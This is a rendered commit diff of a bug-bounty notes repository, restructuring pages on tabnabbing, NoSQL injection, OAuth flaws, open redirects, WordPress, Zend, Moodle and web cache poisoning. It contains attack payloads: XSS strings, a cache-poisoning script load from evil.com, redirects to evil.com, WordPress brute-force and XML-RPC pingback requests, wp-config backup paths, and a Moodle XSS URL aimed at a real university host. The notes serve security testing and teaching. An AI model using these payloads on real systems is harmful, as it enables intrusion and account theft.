	93	+	## References
	94	+	* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
	95	+	* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)

■ ■ ■ ■ ■ ■

Misc/Tabnabbing.md

1	1		# Tabnabbing
	2	+
2	3		## Introduction
3	4		When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
4	5
5		-	## How to Find
	6	+	## How to find
6	7		```html
7	8		<a href="..." target="_blank" rel="" />
8	9
		skipped 12 lines
21	22		```
22	23		2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
23	24		3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
	25	+
	26	+	## References
	27	+	* [Hackerone #260278](https://hackerone.com/reports/260278)

■ ■ ■ ■ ■ ■

NoSQL Injection.md

1	1		## NoSQL injection
2	2
3		-	## Tools
4		-
5		-	* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
6		-
7		-	## Exploit
	3	+	## Introduction
	4	+	NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
8	5
	6	+	## How to Exploit
9	7		### Authentication Bypass
10	8
11	9		Basic authentication bypass using not equal ($ne) or greater ($gt)
		skipped 125 lines
137	135		[$ne]=1
138	136		```
139	137
140		-	## References
	138	+	## Tools
	139	+	* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
141	140
	141	+	## References
142	142		* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
143	143		* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)

■ ■ ■ ■ ■ ■

OAuth Misconfiguration.md

1	1		# OAuth Misconfiguration
2		-	1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
3		-	2. Change Referral header to attacker(.)com while requesting OAuth.
4		-	3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
	2	+
	3	+	## Introduction
	4	+	The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.
	5	+
	6	+	## How to find
	7	+	1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
	8	+	2. Change Referral header to attacker.com while requesting OAuth.
	9	+	3. Create an account with [email protected] with normal functionality. Create account with [email protected] using OAuth functionality. Now try to login using previous credentials.
5	10		4. OAuth Token Re-use.
6	11		5. Missing or broken state parameter.
7	12		6. Lack of origin check.
8	13		7. Open Redirection on another endpoint > Use it in redirect_uri
9	14		8. If there is an email parameter after signin then try to change the email parameter to victim's one.
10	15		9. Try to remove email from the scope and add victim's email manually.
11		-	10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
12		-	11. Check if its leaking client_secret parameter.
13		-	12. Go to the browser history and check if the token is there.
	16	+	10. Only company's email is allowed? > Try to replace hd=company.com to hd=gmail.com
	17	+	11. Check if its leaking client_secret parameter.
	18	+	12. Go to the browser history and check if the token is there.
14	19
15		-	Reference:
16		-	- https://twitter.com/tuhin1729_/status/1417843523177484292
17		-
	20	+	## References
	21	+	* [tuhin1729_](https://twitter.com/tuhin1729_/status/1417843523177484292)
	22	+	* [c0d3x27](https://infosecwriteups.com/the-oauth-misconfiguration-15e66dd19a6e)

■ ■ ■ ■ ■ ■

Open Redirect.md

1	1		## Open Redirect
2	2
	3	+	## Introduction
	4	+	Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
	5	+
	6	+	## How to Find
3	7		1. Try change the domain
4	8		```
5	9		/?redir=evil.com
		skipped 82 lines
88	92		```
89	93		/?redir=/%0d/evil.com
90	94		```
	95	+
	96	+	## References
	97	+	* [Hackerone #1250758](https://hackerone.com/reports/1250758)
	98	+	* [@ahmadbrainworks](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5)

■ ■ ■ ■ ■ ■

README.md

		skipped 6 lines
7	7		![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
8	8
9	9		## List
	10	+	- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md)
10	11		- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
11	12		- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
12	13		- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
		skipped 14 lines
27	28		- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
28	29		- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
29	30		- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
30		-	- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
31		-
32		-	## List CMS
33		-	- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md)
34		-
35		-	## List Framework
36		-	- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
37		-	- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
	31	+	- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
38	32
39	33		## Miscellaneous
40	34		- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
		skipped 11 lines
52	46		- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
53	47		- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
54	48		- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
	49	+	- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
55	50		- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
	51	+	- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
	52	+	- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
56	53
57	54		## Reconnaissance
58	55		- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
		skipped 6 lines

■ ■ ■ ■ ■ ■

Recon/Scope.md

		skipped 10 lines
11	11		- [x] Broken Link Hijacking
12	12		- [x] Data Breach Analysis
13	13		- [x] Misconfigured Cloud Storage
	14	+
14	15		* ### __Medium Scope__
15	16		Usually the scope is wild card scope where all the subdomains are part of scope
16	17		- [x] Subdomain Enumeration
		skipped 16 lines
33	34		- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
34	35		- [x] Heartbleed Scanning
35	36		- [x] General Security Misconfiguration Scanning
	37	+
36	38		* ### __Large Scope__
37	39		Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
38	40		- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.)
		skipped 26 lines

■ ■ ■ ■ ■ ■

Recon/Shodan Dorks.md

		skipped 548 lines
549	549		### Intel Active Management CVE-2017-5689
550	550		```
551	551		"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
552		-	”Active Management Technology”
	552	+	"Active Management Technology"
553	553		```
554	554
555	555		### HP iLO 4 CVE-2017-12542
		skipped 208 lines

Framework/laravel.md Technologies/Laravel.md

Content is identical

■ ■ ■ ■ ■ ■

Technologies/Moodle.md

1	1		# Moodle
2	2
3		-	1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
	3	+	1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
4	4		```
5	5		https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
6	6		```
7	7
8		-	2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
	8	+	2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
9	9
10	10		```
11	11		https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
		skipped 1 lines

■ ■ ■ ■ ■ ■

Technologies/WordPress.md

1	+	# WordPress Common Bugs
2	+
3	+	## Introduction
4	+	What would you do if you came across a website that uses WordPress?
5	+
6	+	1. Find the related CVE by checking the core, plugins, and theme version
7	+	* How to find the wordpress version
8	+	```
9	+	https://target.com/feed
10	+	https://target.com/?feed=rss2
11	+	```
12	+
13	+	* How to find the plugin version
14	+	```
15	+	https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
16	+	https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
17	+	https://target.com/wp-content/plugins/PLUGINNAME/README.txt
18	+	https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
19	+	```
20	+
21	+	> or change readme.txt to changelog.txt or readme.md
22	+
23	+	* How to find the theme version
24	+	```
25	+	https://target.com/wp-content/themes/THEMENAME/style.css
26	+	https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
27	+	```
28	+	If you found outdated core / plugins / themes, find the exploit at https://wpscan.com
29	+
30	+	2. Finding log files
31	+	```
32	+	http://target.com/wp-content/debug.log
33	+	```
34	+
35	+	3. Finding backup file wp-config
36	+	```
37	+	http://target.com/.wp-config.php.swp
38	+	http://target.com/wp-config.inc
39	+	http://target.com/wp-config.old
40	+	http://target.com/wp-config.txt
41	+	http://target.com/wp-config.html
42	+	http://target.com/wp-config.php.bak
43	+	http://target.com/wp-config.php.dist
44	+	http://target.com/wp-config.php.inc
45	+	http://target.com/wp-config.php.old
46	+	http://target.com/wp-config.php.save
47	+	http://target.com/wp-config.php.swp
48	+	http://target.com/wp-config.php.txt
49	+	http://target.com/wp-config.php.zip
50	+	http://target.com/wp-config.php.html
51	+	http://target.com/wp-config.php~
52	+	```
53	+
54	+	4. Get the username on the website
55	+	```
56	+	http://target.com/?author=1
57	+	```
58	+	or
59	+	```
60	+	http://target.com/wp-json/wp/v2/users
61	+	http://target.com/?rest_route=/wp/v2/users
62	+	```
63	+
64	+	5. Bruteforce
65	+	```
66	+	POST /wp-login.php HTTP/1.1
67	+	Host: target.com
68	+
69	+	log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
70	+	```
71	+	or
72	+	```
73	+	POST /xmlrpc.php HTTP/1.1
74	+	Host: target.com
75	+
76	+	<?xml version="1.0" encoding="UTF-8"?>
77	+	<methodCall>
78	+	<methodName>wp.getUsersBlogs</methodName>
79	+	<params>
80	+	<param><value>admin</value></param>
81	+	<param><value>BRUTEFORCE_IN_HERE</value></param>
82	+	</params>
83	+	</methodCall>
84	+	```
85	+
86	+	6. XSPA in wordpress
87	+	```
88	+	POST /xmlrpc.php HTTP/1.1
89	+	Host: target.com
90	+
91	+	<methodCall>
92	+	<methodName>pingback.ping</methodName>
93	+	<params><param>
94	+	<value><string>http://yourip:port</string></value>
95	+	</param><param>
96	+	<value>
97	+	<string>https://target.com></string>
98	+	</value>
99	+	</param></params>
100	+	</methodCall>
101	+	```
102	+

■ ■ ■ ■ ■ ■

Technologies/Zend.md

1	+	# Common bug in Zend framework
2	+
3	+	## Introduction
4	+	What would you do if you came across a website that uses Zend?
5	+
6	+	## How to Detect
7	+
8	+
9	+	1. Finding config files
10	+	```
11	+	https://target.com/application/configs/application.ini
12	+	https://target.com/admin/configs/application.ini
13	+	```

■ ■ ■ ■ ■ ■

Web Cache Poisoning.md

1	1		# Web Cache Poisoning
2		-	## Introduction
	2	+
	3	+	## Introduction
3	4		The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
4	5
5		-	## How to Find
	6	+	## How to FInd
6	7		1. Basic poisoning
7	8		```
8	9		GET / HTTP/1.1
		skipped 20 lines
29	30		…
30	31		<img href="https://a.\"><script>alert(1)</script>a.png" />
31	32		```
	33	+
32	34		2. Seizing the Cache
33	35		```
34	36		GET / HTTP/1.1
		skipped 10 lines
45	47		<script src="https://evil.com/x.js">
46	48		</script>
47	49		```
	50	+
48	51		3. Selective poisoning
49	52		```
50	53		GET / HTTP/1.1
		skipped 9 lines
60	63		…
61	64		<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
62	65		```
	66	+
63	67		4. Chaining Unkeyed Inputs
64	68		- First step
65	69		```
		skipped 44 lines
110	114		<title>HubSpot - Page not found</title>
111	115		<p>The domain canary does not exist in our system.</p>
112	116		```
113		-	To exploit this, we
114		-	need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and
115		-	then finally trick HubSpot into serving this response on goodhire.com
	117	+	To exploit this, we need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on goodhire.com
116	118		```
117	119		GET / HTTP/1.1
118	120		Host: www.goodhire.com
		skipped 17 lines
136	138		HTTP/1.1 302 Found
137	139		Location: https://ghost.org/fail/
138	140		```
139		-	When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a
140		-	blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has
141		-	defined a custom domain, their ghost.io subdomain will simply redirect to it:
	141	+	When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has defined a custom domain, their ghost.io subdomain will simply redirect to it:
142	142		```
143	143		GET / HTTP/1.1
144	144		Host: blog.cloudflare.com
		skipped 5 lines
150	150		Location: http://noshandnibble.blog/
151	151		```
152	152
153		-	Reference:
154		-	- [Portswigger](https://portswigger.net/research/practical-web-cache-poisoning)
	153	+	## References
	154	+	* [Portswigger](https://portswigger.net/research/practical-web-cache-poisoning)

Update structure each readme